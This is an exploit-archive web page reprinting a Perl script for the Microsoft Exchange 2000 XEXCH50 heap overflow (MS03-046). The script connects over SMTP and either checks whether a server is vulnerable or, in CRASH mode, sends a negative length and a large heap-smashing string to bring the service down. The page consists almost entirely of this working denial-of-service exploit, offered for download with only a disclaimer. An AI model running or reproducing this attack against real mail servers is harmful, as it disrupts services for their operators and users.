logo Home

Untitled Document

Home > Archives Exploits > Exploits


Untitled Document
Microsoft Exchange 2000 XEXCH50 Heap Overflow Test Script (MS03-046)
Date: 2003-10-22

Author : hdm <hdm@metasploit.com>
Download : http://www.security-corporation.com/assets/security/download/exploit/ms03-046.pl

#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm[at]metasploit.com
##

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
my $s = SMTP($host, $port);
if (! $s)
{
print "[*] Error establishing connection to SMTP service.\n";
exit(0);
}

print $s "XEXCH50 2 2\r\n";
my $res = <$s>;
close ($s);

# a patched server only allows XEXCH50 after NTLM authentication
if ($res !~ /354 Send binary/i)
{
print "[*] This server has been patched or is not vulnerable.\n";
exit(0);
}

print "[*] This system is vulnerable: $host:$port\n";

exit(0);
}


sub crash
{
my $s = SMTP($host, $port);
if (! $s)
{
print "[*] Error establishing connection to SMTP service.\n";
exit(0);
}

# the negative value allows us to overwrite random heap bits
print $s "XEXCH50 -1 2\r\n";
my $res = <$s>;

# a patched server only allows XEXCH50 after NTLM authentication
if ($res !~ /354 Send binary/i)
{
print "[*] This server has been patched or is not vulnerable.\n";
exit(0);
}

print "[*] Sending massive heap-smashing string...\n";
print $s ("META" x 16384);

# sometimes a second connection is required to trigger the crash
$s = SMTP($host, $port);

exit(0);
}


sub usage
{
print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
exit(0);

}

sub SMTP
{
my ($host, $port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) || return(undef);

my $r = <$s>;
return undef if !$r;

if ($r !~ /Microsoft/)
{
chomp($r);
print STDERR "[*] This does not look like an exchange server: $r\n";
return(undef);
}

print $s "HELO X\r\n";
$r = <$s>;
return undef if !$r;

print $s "MAIL FROM: DoS\r\n";
$r = <$s>;
return undef if !$r;

print $s "RCPT TO: Administrator\r\n";
$r = <$s>;
return undef if !$r;

return($s);
}






Any use of these codes are at the user's own responsibility.

 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy